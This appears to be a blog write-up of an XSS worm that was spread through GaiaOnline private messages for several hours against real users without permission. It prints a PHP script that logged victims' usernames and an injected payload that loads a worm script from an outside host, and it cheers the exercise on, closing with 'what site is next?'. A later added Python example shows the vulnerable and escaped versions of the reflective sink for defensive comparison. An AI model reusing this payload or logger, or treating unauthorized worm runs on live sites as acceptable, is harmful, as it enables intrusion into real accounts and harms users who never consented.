GaiaOnline is a highly popular web-based game and a perfect target for an XSS worm, which is exactly what Kyran set out to build, with a little help from Kuza. I’ll be writing about his worm, why it’s so special, the results he collected and the response from GaiaOnline.
Normally, when you consider an XSS worm such as the infamous Samy worm or the lesser-known IPB ones, the one thing they have in common is how they spread: they abuse a filter flaw to store themselves in some permanent storage, such as the user’s profile or the user’s signature. This worm differs in that it uses only reflective XSS holes.
A reflective XSS hole is one where the input you provide is not stored but is only printed onto the page because it was one of your input variables, usually sent via GET or POST; in this case, POST.
Back to the worm. Kyran was not interested in causing havoc; this worm is merely an experiment to see how far a non-permanent worm can spread on a site with a reach of 40% (source). First I’ll give you the logging script used.
<meta http-equiv="refresh" content="0;url=http://www.gaiaonline.com">
<?php
// Declares file to log to.
$myFile = "log.txt";
// Set file handler, or end execution if the file can't be opened.
$fh = fopen($myFile, 'a') or die("can't open file");
// Take data sent via POST from start.js and put it in $stringData
$stringData = $_POST["username"];
// Add a tilde followed by a newline to divide each entry.
$stringData .= "~\n";
// Write string to file and release the handle.
fwrite($fh, $stringData);
fclose($fh);
?>
As you can see he only logged the username, as he was not interested in actually taking control of any accounts. Sadly no timestamp was set on each record, but I’m hedging my bets that next time there will be :p.
Now, onto the more juicy bits, the worm. It’s not long code (you won’t have to wade through something Samy-like again). In short it does this:
- Create the content that replaces the page
- Set up an AJAX object
- Create the variables used to send a PM (sending the PM to everyone in the victim’s friends list)
- Send the PM.
Gaia has a feature whereby a PM sent to friends@gaia actually goes to everyone in your friends list. This allowed for an obvious shortcut in the code, but the worm would be perfectly possible without it; it would just require one extra AJAX request and some parsing. The payload of the PM is as follows:
“><script defer xsrc=//gaiaonli.site.com/start.js></script><style> (url changed)
As you can see it just pulls in the script again, which in turn sends the PM to everyone in the friends list. I’ve got a copy of the script here; I have changed the URLs of log.php and start.js in the code, but otherwise this is what start.js would have looked like.
That’s the worm. It can be argued that it is a persistent attack, as it is stored in a PM, but as Kyran said “the XSS is reflective, just the propagation method is persistent. But, that’s just semantics”.
What was logged through this worm? Kyran ran the worm for 3-4 hours (with a central .js file it’s easy to stop the worm) and logged 1500 unique usernames, but not much more can be deduced in terms of growth over time due to the lack of timestamps. Since the passwords weren’t logged we cannot check statistics on those, but I would hazard a guess at the statistics being similar to those of sites like MySpace. In any case, the point of this exercise was to see how well a reflective XSS worm can spread on a large site.
Kyran did post the worm (code included) on their forum, but that was quickly taken down by one of their mods. He created a new thread without the code in it, which has stayed up. Here’s Kyran’s summary of the second thread: “the staff haven’t posted anything. It’s mostly people calling me a terrorist”. As yet they haven’t contacted him for any details (it is possible the mod who took down the first thread kept a copy of the code, in which case there is no need to contact Kyran if all they want to do is patch the hole).
What can be understood from this whole incident? Reflective XSS can viably be used to spread an effective worm, and sending variables via POST does not make people any safer. Considering how very common reflective XSS is (34 pages of reflective XSS flaws), this is something webmasters really need to start getting to grips with. Furthermore, it’s clear that GaiaOnline aren’t ready for users reporting flaws: they don’t know what to do when a flaw is reported and they aren’t too quick at fixing them (at the time of writing the flaw is still up).
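To make the reflective hole described in the definition above and in this conclusion concrete, here is an added example (not code from the write-up, from Kyran, or from Gaia) modelling the POST reflection sink in Python: the same attribute sink rendered unencoded and HTML-encoded, fed the PM payload quoted above. The field name msg and the host gaiaonli.example are assumptions.

```python
import html
from urllib.parse import parse_qs, urlencode

# Constructed sample input: the PM payload quoted in the write-up, submitted
# as a URL-encoded POST body. Field name "msg" and the host are assumptions.
PAYLOAD = '"><script defer xsrc=//gaiaonli.example/start.js></script><style>'
SAMPLE_BODY = urlencode({"msg": PAYLOAD})


def vulnerable_render(post_body: str) -> str:
    """Reflective hole: the POST field is echoed into an attribute unencoded,
    so the leading quote closes the attribute and the rest becomes markup."""
    msg = parse_qs(post_body).get("msg", [""])[0]
    return '<input type="text" name="msg" value="' + msg + '">'


def hardened_render(post_body: str) -> str:
    """Same sink, but the value is HTML-encoded (quotes included) before it is
    echoed, so the browser sees text rather than a closed attribute and a tag."""
    msg = parse_qs(post_body).get("msg", [""])[0]
    safe = html.escape(msg, quote=True)
    return '<input type="text" name="msg" value="' + safe + '">'


def reflects_script(rendered: str) -> bool:
    """Comparison check: does a live <script tag survive in the rendered HTML?"""
    return "<script" in rendered.lower()


if __name__ == "__main__":
    for name, render in (("vulnerable", vulnerable_render), ("hardened", hardened_render)):
        out = render(SAMPLE_BODY)
        print(f"{name}: script reflected = {reflects_script(out)}")
        print("  " + out)
```

Using POST instead of GET changes nothing here: both sinks receive the same decoded string, and only the encoding step decides whether the quote in the payload closes the attribute.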
Now… what site is next?